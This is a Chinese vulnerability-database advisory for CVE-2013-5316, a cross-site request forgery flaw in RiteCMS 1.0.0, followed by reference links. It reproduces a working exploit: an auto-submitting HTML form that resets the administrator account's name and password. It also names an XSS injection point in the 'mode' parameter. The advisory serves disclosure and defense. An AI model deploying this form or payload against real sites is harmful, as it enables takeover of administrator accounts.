RiteCMS 跨站请求伪造漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1121803 漏洞类型 跨站请求伪造
发布时间 2013-08-03 更新时间 2013-08-22
CVE编号 CVE-2013-5316 CNNVD-ID CNNVD-201308-043
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/27315
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201308-043
|漏洞详情
RiteCMS是RiteCMS项目所开发的一套简单的、轻量级的内容管理系统(CMS)。该系统具有易于开发、安装、维护等特点。RiteCMS1.0.0版本中存在跨站请求伪造漏洞,该漏洞源于程序没有正确验证用户提交到index.php脚本的输入。远程攻击者可通过发送畸形的HTTP请求到cms/index.php脚本,利用该漏洞更改管理员密码。
|漏洞EXP
###########################################################################################
# Exploit Title: RiteCMS multiple vulnerabilities
# Date: 2013 30 July
# Exploit Author: Yashar shahinzadeh
# Credit goes for: ha.cker.ir
# Vendor Homepage: http://ritecms.com/
# Tested on: Linux & Windows, PHP 5.2.9
# Affected Version : 1.0.0
#
# Contacts: { http://Twitter.com/YShahinzadeh , http://y-shahinzadeh.ir }
###########################################################################################

Summary:
========
1. CSRF - Change administrator's password
2. Cross site scripting

1. CSRF - Adding an admin account:
==================================

<html>
<body onload="submitForm()">
<form name="myForm" id="myForm"
                action="http://[Path to RiteCMS]/cms/index.php" method="post">
                <input type="hidden" name="mode" value="users">
                <input type="hidden" name="id" value="1">
                <input type="hidden" name="name" value="admin1">
				<input type="hidden" name="new_pw" value="admin">
				<input type="hidden" name="new_pw_r" value="admin">
				<input type="hidden" name="type" value="1">
				<input type="hidden" name="edit_user_submitted" value="%C2%A0OK%C2%A0">
</form>
<script type='text/javascript'>document.myForm.submit();</script>
</html>


2. Cross site scripting (After auth):
=====================================
http://localhost:80//ritecms.1.0.0.tinymce/cms/index.php?mode=[XSS]
|参考资料

来源:XF
名称:ritecms-index-csrf(86193)
链接:http://xforce.iss.net/xforce/xfdb/86193
来源:BID
名称:61587
链接:http://www.securityfocus.com/bid/61587
来源:EXPLOIT-DB
名称:27315
链接:http://www.exploit-db.com/exploits/27315
来源:packetstormsecurity.com
链接:http://packetstormsecurity.com/files/122663/Rite-CMS-1.0.0-Cross-Site-Request-Forgery-Cross-Site-Scripting.html